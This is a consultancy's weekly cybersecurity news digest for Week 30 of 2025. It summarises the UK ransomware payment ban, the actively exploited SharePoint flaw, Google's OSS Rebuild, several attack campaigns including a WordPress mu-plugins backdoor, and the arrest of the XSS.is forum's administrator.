Week 30 of 2025 saw a surge in cybersecurity developments spanning policy, infrastructure vulnerabilities, advanced threat campaigns and law enforcement action.

The UK took a firm stance on ransomware by introducing a public sector payment ban and mandatory reporting requirements, aiming to break the financial incentives behind these attacks.

Meanwhile, a critical zero-day vulnerability in Microsoft SharePoint is being actively exploited, prompting urgent patching and mitigation efforts. Google unveiled its OSS Rebuild initiative to strengthen open-source software integrity and prevent supply chain tampering.

On the threat actor front, over 3,500 websites were hijacked for a stealthy JavaScript based crypto mining campaign and a phishing group dubbed PoisonSeed found a way to bypass FIDO based MFA using QR-based cross-device flows.

WordPress users also face new risks, with attackers using the mu-plugins directory to implant persistent, invisible backdoors.

In a significant win for global cybercrime enforcement, Europol arrested the admin of the XSS.is forum in Kyiv, disrupting one of the longest running Russian language cybercrime marketplaces.

Read the full breakdown below to explore key incidents, emerging threats and the latest defensive strategies shaping cybersecurity in Week 30 of 2025.

UK Introduces Tough Ransomware Measures for Public and Private Sectors

The UK government, via the National Cyber Security Centre and Home Office, has unveiled a robust package of ransomware regulations following public consultation.

Under these new rules, public sector bodies and critical national infrastructure, including the NHS, local councils and schools, will be barred from paying ransom demands.

Private sector businesses will be mandated to notify authorities before paying ransomware, enabling guidance on legal and safety implications. Additionally, a mandatory incident reporting regime is being introduced to provide law enforcement with essential intelligence, support victims, and disrupt ransomware operations.

The initiative aims to dismantle the ransomware business model, enhance resilience through backups and incident-preparation plans and builds on the government’s broader “Plan for Change” strategy.

Critical Exploited Vulnerability Affects Microsoft SharePoint

The NCSC has issued an urgent advisory regarding two vulnerabilities in Microsoft SharePoint, most notably CVE-2025-53770, a critical deserialisation flaw (CVSS 9.8) affecting SharePoint Enterprise Server 2016, Server 2019 and Subscription Edition. This vulnerability allows unauthorised remote code execution over a network and is confirmed to be actively exploited in the wild.

A second flaw, CVE-2025-53771 (CVSS 6.5), permits path traversal and spoofing but is not yet exploited.

Microsoft is preparing a comprehensive update for CVE-2025-53770. In the meantime, organisations are urged to apply available mitigations, use supported versions, enable AMSI with AV, deploy endpoint protection, rotate ASP.NET machine keys and if necessary, disconnect SharePoint servers from the internet.

The NCSC stresses immediate action to reduce the risk of compromise.

Google Launches OSS Rebuild to Detect Malicious Code in Open‑Source Packages

On July 23rd, Google’s Open Source Security Team introduced OSS Rebuild, an initiative aimed at enhancing the security of open source ecosystems by independently rebuilding and verifying artifacts from popular package repositories like Python, npm and Rust.

By generating transparent build metadata using a declarative process aligned with the SLSA framework, OSS Rebuild enables security teams to easily identify tampered packages, notably without burdening upstream maintainers.

Google noted that their goal is to empower organisations to understand and control their software supply chains more deeply, reducing the risk of supply chain attacks targeting widely-used dependencies

Over 3,500 Websites Hijacked for Stealthy JavaScript Crypto Mining Campaign

A widespread attack has compromised more than 3,500 websites globally, injecting obfuscated JavaScript miners into their pages.

This campaign revives browser based cryptojacking by using WebSockets and dynamic mining intensity, assessing device capabilities, spawning background Web Workers and throttling resource usage to remain hidden from users and security tools.

Notably, the same domains deploying these miners have also been linked to Magecart credit card skimmers, suggesting attackers are diversifying payloads for both covert mining and financial data theft.

This stealthy, multi-pronged approach highlights an evolved threat model targeting both computational and financial gain.

PoisonSeed Phishing Abuses QR Based FIDO “Cross‑Device” Flow to Bypass Security Keys

Cybersecurity researchers have identified a dangerous phishing campaign by the threat actor PoisonSeed, who sidestep FIDO2 security keys by exploiting the “cross‑device sign‑in” feature with QR code fallback.

Victims are lured to spoofed login portals such as Okta, where stolen credentials are relayed in real-time to the real login page, triggering a legitimate QR based authentication. The QR code is then captured and displayed on the fake site. Once scanned by the victim’s authenticator app, it allows attackers full access without ever compromising the FIDO key itself.

Europol Apprehends XSS.is Admin Shutting Down 50K‑User Cybercrime Hub

Europol, French police and Ukrainian authorities arrested the suspected administrator of XSS.is, a notorious Russian language cybercrime forum formerly known as DaMaGeLaB in Kyiv.

Operating since 2013 with over 50,000 registered users, XSS.is facilitated the sale of stolen data, hacking tools, ransomware services, escrow dispute services and encrypted messaging via its own Jabber server.

Law enforcement seized the forum’s clearnet domain and now displays a seizure notice from France’s cybercrime unit alongside Ukraine’s SBU Cyber Department.

The administrator is believed to have earned around €7 million through advertising and transaction fees and was tied to additional platforms like thesecure.biz.

Hackers Insert Stealth Backdoor into WordPress “mu‑plugins”

Security researchers at Sucuri have uncovered a stealthy backdoor embedded within the “must-use” (mu-plugins) directory on compromised WordPress sites.

Unlike regular plugins, mu-plugins are auto-enabled and invisible in the admin dashboard, enabling attackers to stay hidden.

The malicious wp-index.php loader fetches a remote payload (ROT13‑obfuscated), writes it to the database, injects a hidden file manager, creates a rogue admin user called “officialwp,” and activates another malicious plugin to ensure persistence.

It also resets standard admin passwords if removed, giving attackers full remote PHP code execution, site defacement capabilities or malware distribution, all without triggering typical plugin based detection.

If you would like to discover how Secora Consulting can assist you in keeping your business secure, please get in touch by filling out the form below 👇.